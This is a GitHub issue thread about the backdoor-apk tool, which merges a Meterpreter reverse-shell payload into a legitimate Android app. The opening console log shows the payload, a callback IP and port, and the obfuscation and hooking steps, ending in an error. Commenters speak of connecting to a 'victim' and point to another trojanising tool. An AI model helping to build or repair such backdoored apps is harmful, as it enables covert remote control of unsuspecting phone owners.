### ISSUE TITLE
backdoor-apk error "Failed to add hook"

### ISSUE THREAD

**Issue by steve01101** [dana-at-cp/backdoor-apk#144]
`1) meterpreter/reverse_http   4) shell/reverse_http
2) meterpreter/reverse_https  5) shell/reverse_https
3) meterpreter/reverse_tcp    6) shell/reverse_tcp
[?] Please select an Android payload option: 3
[?] Please enter an LHOST value: 52.14.61.47
[?] Please enter an LPORT value: 18120
[+] Android manifest permission options:
1) Keep original
2) Merge with payload and shuffle
[?] Please select an Android manifest permission option: 1
[+] Handle the payload via resource script: msfconsole -r backdoor-apk.rc
[*] Generating RAT APK file...done.
[*] Decompiling original APK file...done.
[+] Keeping permissions of original project
[*] Running proguard on RAT APK file...done.
[*] Decompiling obfuscated RAT APK file...done.
[*] Creating new directories in original project for RAT smali files...done.
[*] Copying RAT smali files to new directories in original project...done.
[*] Fixing RAT smali files...done.
[*] Obfuscating const-string values in RAT smali files...done.
[*] Locating smali file to hook in original project...done.
[*] Adding hook in original smali file..../backdoor-apk.sh: line 85: [: too many arguments
done.
[!] Failed to add hook`

**Comment by rameshdevalla** [comment]
This is the biggest problem in this tool did you got the solution

**Comment by steve01101** [comment]
I have version 2.3.1 of apktool, I do not understand why it does not work. what is the hook?

**Comment by steve01101** [comment]
I have version 2.3.1 of apktool, I do not understand why it does not work. what is the hook?

**Comment by rameshdevalla** [comment]
Hook means a file which gives connection between you and victim

**Comment by rameshdevalla** [comment]
For reverse connection

**Comment by steve01101** [comment]
I solved by changing apk, but now there is another problem "Failed to recompile original project with backdoor"

**Comment by rameshdevalla** [comment]
Use evil-droid v ll get an backdoor apk without any flaws its pretty much bro I'm using that

**Comment by steve01101** [comment]
ok thanks I can use evil-droid with msfconsole? and ngrok?

**Comment by rameshdevalla** [comment]
Yeah bro u can use

**Comment by steve01101** [comment]
are you serious? an error with evil-droid "Failed to verify signed artifacts"

**Comment by steve01101** [comment]
I would like to use backdoor-apk. if someone knows how to fix my problem with backdoor-apk I will thank him

**Comment by dana-at-cp** [comment]
@steve01101 @rameshdevalla A new release is coming soon that resolves a number of issues.

**Comment by dana-at-cp** [comment]
@steve01101 @rameshdevalla Please try version 0.2.4 and let me know if the problem persists.

**Comment by dana-at-cp** [comment]
@steve01101 @rameshdevalla This should be fixed in versions 0.2.4 and 0.2.4a. Please reopen a new issue if you encounter the same problem.
